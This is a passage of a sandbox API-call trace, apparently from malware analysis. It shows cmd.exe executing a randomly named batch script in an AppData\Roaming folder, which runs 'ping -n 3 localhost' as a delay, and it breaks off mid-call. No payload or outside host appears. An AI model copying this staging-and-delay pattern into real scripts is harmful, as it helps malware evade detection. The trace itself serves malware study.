lpFindFileData=0x18f944) returned 0x1cff88 [0094.066] FindClose (in: hFindFile=0x1cff88 | out: hFindFile=0x1cff88) returned 1 [0094.066] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0094.066] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0094.066] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0094.067] GetEnvironmentStringsW () returned 0x1d2a68* [0094.067] FreeEnvironmentStringsW (penv=0x1d2a68) returned 1 [0094.067] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.068] GetConsoleOutputCP () returned 0x1b5 [0094.171] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0094.171] GetUserDefaultLCID () returned 0x409 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd08, cchData=128 | out: lpLCData="0") returned 2 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fd08, cchData=128 | out: lpLCData="0") returned 2 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fd08, cchData=128 | out: lpLCData="1") returned 2 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0094.171] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0094.172] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0094.172] GetConsoleTitleW (in: lpConsoleTitle=0x1c0880, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.172] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0094.172] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0094.173] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0094.173] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0094.176] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd", _String2=")") returned 58 [0094.176] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd") returned 3 [0094.176] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd") returned 3 [0094.176] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd") returned 6 [0094.176] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd") returned 6 [0094.176] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd") returned 15 [0094.176] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd") returned 15 [0094.176] GetConsoleTitleW (in: lpConsoleTitle=0x18fa00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.176] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.176] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.177] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f7bc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f7b4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f7b4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0094.177] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0094.177] SetErrorMode (uMode=0x0) returned 0x0 [0094.177] SetErrorMode (uMode=0x1) returned 0x0 [0094.177] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x1d1a70, lpFilePart=0x18f520 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x18f520*="vMfCCeRYkvQy") returned 0x2d [0094.177] SetErrorMode (uMode=0x0) returned 0x1 [0094.177] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0094.178] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.181] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.181] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd", fInfoLevelId=0x1, lpFindFileData=0x18f2bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f2bc) returned 0x1c0f10 [0094.181] FindClose (in: hFindFile=0x1c0f10 | out: hFindFile=0x1c0f10) returned 1 [0094.181] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0094.181] GetConsoleTitleW (in: lpConsoleTitle=0x18f794, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.182] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0094.184] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0094.184] IdentifyCodeAuthzLevelW () returned 0x1 [0094.190] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0094.190] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0094.190] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0094.190] CloseCodeAuthzLevel () returned 0x1 [0094.190] SetErrorMode (uMode=0x0) returned 0x0 [0094.190] SetErrorMode (uMode=0x1) returned 0x0 [0094.190] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd", nBufferLength=0x104, lpBuffer=0x1c0b88, lpFilePart=0x18f680 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd", lpFilePart=0x18f680*="RiKWxOaL.cmd") returned 0x3a [0094.190] SetErrorMode (uMode=0x0) returned 0x1 [0094.190] CmdBatNotification () returned 0x0 [0094.191] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\rikwxoal.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0094.191] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0094.191] _get_osfhandle (_FileHandle=3) returned 0x58 [0094.191] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.191] _get_osfhandle (_FileHandle=3) returned 0x58 [0094.191] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.191] ReadFile (in: hFile=0x58, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x18f6a8*=0x7b, lpOverlapped=0x0) returned 1 [0094.192] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0094.192] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=21, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0094.192] _get_osfhandle (_FileHandle=3) returned 0x58 [0094.192] GetFileType (hFile=0x58) returned 0x1 [0094.192] _get_osfhandle (_FileHandle=3) returned 0x58 [0094.192] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0094.193] _wcsicmp (_String1="ping", _String2=")") returned 71 [0094.193] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0094.193] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0094.193] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0094.193] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0094.193] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0094.193] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0094.194] _tell (_FileHandle=3) returned 21 [0094.194] _close (_FileHandle=3) returned 0 [0094.194] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f47c | out: _Buffer="\r\n") returned 2 [0094.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.194] GetFileType (hFile=0x7) returned 0x2 [0094.194] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.194] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f43c | out: lpMode=0x18f43c) returned 1 [0094.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.194] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f468, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f468*=0x2) returned 1 [0094.195] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0094.195] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.195] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x18f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0094.195] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x18f478 | out: _Buffer=">") returned 1 [0094.195] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.195] GetFileType (hFile=0x7) returned 0x2 [0094.195] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.195] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f440 | out: lpMode=0x18f440) returned 1 [0094.195] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.195] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x18f46c, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x18f46c*=0x19) returned 1 [0094.195] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.195] GetFileType (hFile=0x7) returned 0x2 [0094.195] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.196] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6c4 | out: lpMode=0x18f6c4) returned 1 [0094.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.196] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1d3270*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x18f6f0, lpReserved=0x0 | out: lpBuffer=0x1d3270*, lpNumberOfCharsWritten=0x18f6f0*=0x4) returned 1 [0094.196] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x18f6fc | out: _Buffer=" -n 3 localhost ") returned 16 [0094.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.196] GetFileType (hFile=0x7) returned 0x2 [0094.196] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.196] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6bc | out: lpMode=0x18f6bc) returned 1 [0094.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.196] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x18f6e8, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f6e8*=0x10) returned 1 [0094.196] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f71c | out: _Buffer="\r\n") returned 2 [0094.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.196] GetFileType (hFile=0x7) returned 0x2 [0094.196] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.196] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6dc | out: lpMode=0x18f6dc) returned 1 [0094.197] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.197] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f708, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f708*=0x2) returned 1 [0094.197] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0094.197] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0094.197] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0094.197] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0094.197] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0094.197] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0094.197] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0094.197] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0094.197] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0094.197] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0094.197] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0094.197] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0094.197] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0094.197] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0094.197] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0094.197] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0094.197] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0094.197] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0094.197] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0094.197] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0094.197] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0094.197] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0094.197] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0094.197] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0094.197] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0094.197] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0094.197] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0094.197] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0094.197] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0094.197] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0094.197] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0094.197] _wcsicmp (_String1="ping", _String2="START") returned -3 [0094.197] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0094.197] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0094.197] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0094.197] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0094.197] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0094.197] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0094.198] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0094.198] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0094.198] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0094.198] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0094.198] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0094.198] SetErrorMode (uMode=0x0) returned 0x0 [0094.198] SetErrorMode (uMode=0x1) returned 0x0 [0094.198] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1d0b18, lpFilePart=0x18f4c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f4c0*="Desktop") returned 0x18 [0094.198] SetErrorMode (uMode=0x0) returned 0x1 [0094.198] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.198] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0094.199] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.199] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.199] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x18f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f23c) returned 0xffffffff [0094.199] GetLastError () returned 0x2 [0094.199] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x18f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f23c) returned 0xffffffff [0094.199] GetLastError () returned 0x2 [0094.199] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.199] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x18f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f23c) returned 0x1d0e00 [0094.199] FindClose (in: hFindFile=0x1d0e00 | out: hFindFile=0x1d0e00) returned 1 [0094.199] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x18f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f23c) returned 0xffffffff [0094.199] GetLastError () returned 0x2 [0094.199] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x18f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f23c) returned 0x1d0e00 [0094.200] FindClose (in: hFindFile=0x1d0e00 | out: hFindFile=0x1d0e00) returned 1 [0094.200] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0094.200] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0094.200] GetConsoleTitleW (in: lpConsoleTitle=0x18f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.200] SetErrorMode (uMode=0x0) returned 0x0 [0094.200] SetErrorMode (uMode=0x1) returned 0x0 [0094.200] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1dfae8, lpFilePart=0x18edac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18edac*="Desktop") returned 0x18 [0094.200] SetErrorMode (uMode=0x0) returned 0x1 [0094.200] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.200] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0094.200] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.200] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.200] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x18eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb28) returned 0xffffffff [0094.200] GetLastError () returned 0x2 [0094.201] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x18eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb28) returned 0xffffffff [0094.201] GetLastError () returned 0x2 [0094.201] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x18eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb28) returned 0x1dfdd0 [0094.201] FindClose (in: hFindFile=0x1dfdd0 | out: hFindFile=0x1dfdd0) returned 1 [0094.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x18eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb28) returned 0xffffffff [0094.201] GetLastError () returned 0x2 [0094.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x18eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb28) returned 0x1dfdd0 [0094.201] FindClose (in: hFindFile=0x1dfdd0 | out: hFindFile=0x1dfdd0) returned 1 [0094.201] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0094.201] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0094.201] GetConsoleTitleW (in: lpConsoleTitle=0x18f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.201] InitializeProcThreadAttributeList (in: lpAttributeList=0x18eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18ef70 | out: lpAttributeList=0x18eea8, lpSize=0x18ef70) returned 1 [0094.202] UpdateProcThreadAttribute (in: lpAttributeList=0x18eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18eea8, lpPreviousValue=0x0) returned 1 [0094.202] GetStartupInfoW (in: lpStartupInfo=0x18ee64 | out: lpStartupInfo=0x18ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0094.202] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0094.203] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18ef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ef50 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x18ef50*(hProcess=0x54, hThread=0x58, dwProcessId=0xb3c, dwThreadId=0xb40)) returned 1 [0094.533] CloseHandle (hObject=0x58) returned 1 [0094.533] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0094.533] GetEnvironmentStringsW () returned 0x1dfef8* [0094.533] FreeEnvironmentStringsW (penv=0x1dfef8) returned 1 [0094.533] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0100.663] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x18ee44 | out: lpExitCode=0x18ee44*=0x0) returned 1 [0100.663] CloseHandle (hObject=0x54) returned 1 [0100.663] _vsnwprintf (in: _Buffer=0x18ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ee50 | out: _Buffer="00000000") returned 8 [0100.664] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0100.664] GetEnvironmentStringsW () returned 0x1dfef8* [0100.664] FreeEnvironmentStringsW (penv=0x1dfef8) returned 1 [0100.664] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0100.664] GetEnvironmentStringsW () returned 0x1dfef8* [0100.664] FreeEnvironmentStringsW (penv=0x1dfef8) returned 1 [0100.664] DeleteProcThreadAttributeList (in: lpAttributeList=0x18eea8 | out: lpAttributeList=0x18eea8) [0100.664] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.664] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.664] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.664] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.664] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.664] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.664] SetConsoleInputExeNameW () returned 0x1 [0100.664] GetConsoleOutputCP () returned 0x1b5 [0100.664] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.664] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.665] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\rikwxoal.cmd"), dwDesiredAccess=0x80000000, 